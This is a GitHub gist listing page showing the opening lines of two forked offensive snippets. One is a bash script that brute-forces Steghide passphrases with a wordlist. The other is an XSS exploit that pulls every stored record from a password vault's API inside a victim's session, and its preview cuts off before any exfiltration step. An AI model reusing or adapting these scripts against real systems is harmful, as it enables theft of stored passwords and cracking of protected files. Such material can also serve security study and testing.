Skip to content

Instantly share code, notes, and snippets.

View SecuritySura's full-sized avatar
🎯
Focusing

SecuritySura SecuritySura

🎯
Focusing
View GitHub Profile
@SecuritySura
SecuritySura / steghidebruteforcescript.sh
Last active March 7, 2019 05:51 — forked from itsecurityco/steghidebf.sh
Script to brute force a file treated with Steghide software
#!/bin/bash
printf "usage steghidebruteforcescript.sh imagefile.jpg wordlist.txt \n";
stegofile=$1;
dict=$2;
printf "Steghide Bruteforce (c) 2017 by Juan Escobar\n";
printf "stegofile: %s\n" "$stegofile";
printf "wordlist: %s\n\n" "$dict";
for passphrase in $(cat $dict); do
@SecuritySura
SecuritySura / password_vault_exploit.js
Created August 20, 2018 17:37 — forked from shawarkhanethicalhacker/password_vault_exploit.js
XSS Exploit code for retrieving passwords stored in a Password Vault
//Exploit Code by Shawar Khan
var data_chunks = '';
// Capturing Records from API
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {
// Holds the records in as String
var allrecords = data;
// converting response to JSON